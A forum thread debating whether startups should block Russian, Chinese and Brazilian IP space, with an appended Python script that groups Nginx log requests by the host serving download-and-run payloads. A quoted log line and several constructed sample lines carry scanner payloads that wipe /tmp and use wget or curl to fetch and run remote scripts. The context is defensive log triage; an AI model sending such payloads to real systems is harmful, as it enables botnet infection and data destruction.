by b112 1226 days ago
Hilarious. Someone said block China and Russia, and we have a long response "USA bad! China not as bad!".

No mention of Russia, and the original poster probably has nothing to do with the US.

Here's the thing, China and Russia are the wild west of the internet. Someone starts to DDoS a UK IP from the US, and it gets shut down hard and fast.

Someone starts to DDoS from Russia or China, and reports are dropped on the floor. Same for hacking attempts.

And yes, if someone from Russia or China reports errant activity to me, they are listened to.

There is absolutely no comparison. These zones are useless for most companies. No one in China or Russia is buying anything from much of the rest of the world. Russia spews more spam than the rest of the planet combined.

Dropping their IP space on the floor is the smartest thing a startup can do.

And the manufactured outrage is hilarious. These two countries block everything they can already, meaning legit traffic is rare. The great firewall of China means few will visit your site anyhow.

Drop Russia, China, and even Brazil (whose network ops never ever ever respond to spam reports).

Your admin life will be immensely better, and it will cost you nothing, nada, zilch. All upside, zero downside.


> Drop Russia, China, and even Brazil (whose network ops never ever ever respond to spam reports).

I don't mean to be presumptuous, but what is the benefit of this? Do you spend all day stressing when you see

    112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"

in your Nginx logs? Actual financial fraud occurs using US residential proxies. Automated scanning occurs in those countries because they have a bunch of cheap insecure routers and IoT devices. Writing angry abuse reports all day is misdirected because the scanning device is probably some hacked Hikvision camera, not a master hacker. You'd be better off trying to get the C2 shut down.

So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

Completely untrue.

So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

And spam has 0 cost, right?

Read the equation again.. 0 downside, endless upside.

> So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

If you're referring to banking fraud I'm pretty sure the answer is mostly yes. Maybe sometimes fraudsters are lazy.

> So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

It does, I'm just saying it's almost entirely automated scans and brute force using default password combinations and several-year-old CVEs. If you are vulnerable to those you have bigger problems.

> And spam has 0 cost, right?

Unless you are running some ancient configuration the cost is lower than the amount of engineering work and mental capacity you appear to be devoting to stopping it.

I'm not saying you shouldn't make the tradeoff or that it's wrong to do it, just that the amount of security you think you are gaining from it is not as high as you think.

I love it. Statements peppered with "almost" and "mostly". How if you are updated, well then you're golden, cause mostly it's old CVEs.

Which ignores that even 0.001% of traffic is a load of more skilled bad actors, this IP space is rotten to the core.

Throughout, I have stated 0 downside, all upside. Even one dedicated hacker gone, is a plus in this scenario. Even showing yourself to be actively, aggressively defending is a plus, if comparables are less guarded.

And you're bracketing the use case, others and I have been speaking of the generic. Many run MTAs, so cutting down on inbound spam and malware, pre-filtering is a plus.

Canning all this address space is a never lose, always win, plus plus plus.

Save yourself the grief. Hot potato it.
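
Added example, not part of the thread: a log triage sketch for the point raised above about reporting the payload host rather than each scanning device. It groups download-and-run requests in Nginx combined-format logs by the host the payload is fetched from. The names `triage`, `LINE_RE` and `FETCH_RE` are assumptions of this example, and every sample line except the first (quoted in the thread) is constructed, using documentation-range addresses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Nginx "combined" format: src - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?:\d+|-) "[^"]*" "[^"]*"$'
)
# A wget/curl call followed by the host it downloads from (scheme optional).
FETCH_RE = re.compile(
    r'\b(?:wget|curl)\b[^;|&]*?(?:https?://)?'
    r'(?P<host>(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)'
    r'(?P<path>/[^\s;|&]*)?',
    re.IGNORECASE,
)

SAMPLE = [
    # Line quoted in the thread:
    '112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"',
    # Constructed lines (RFC 5737 documentation addresses):
    '198.51.100.7 - - [14/Feb/2023:00:03:41 +0000] "GET /cgi-bin/test?x=1;wget+http://203.0.113.50/b.sh HTTP/1.1" 404 153 "-" "-"',
    '192.0.2.44 - - [14/Feb/2023:00:05:02 +0000] "GET /cgi-bin/test?x=1;curl+203.0.113.50/b.sh|sh HTTP/1.1" 200 612 "-" "-"',
    '192.0.2.10 - - [14/Feb/2023:00:06:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

def triage(lines):
    """Group download-and-run requests by the host serving the payload."""
    hosts = defaultdict(lambda: {"sources": set(), "paths": set(), "not_rejected": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        parts = m["request"].split(" ") if m else []
        if len(parts) != 3:
            continue  # unparseable line or malformed request
        fetch = FETCH_RE.search(unquote_plus(parts[1]))  # '+' and %xx decoded first
        if not fetch:
            continue  # no download command in the request target
        entry = hosts[fetch["host"].lower()]
        entry["sources"].add(m["src"])
        entry["paths"].add(fetch["path"] or "/")
        # A 4xx/5xx means this server refused the request; anything else needs a look.
        if not m["status"].startswith(("4", "5")):
            entry["not_rejected"].append((m["src"], int(m["status"])))
    return dict(hosts)

if __name__ == "__main__":
    for host, info in triage(SAMPLE).items():
        print(host, sorted(info["sources"]), sorted(info["paths"]), info["not_rejected"])
```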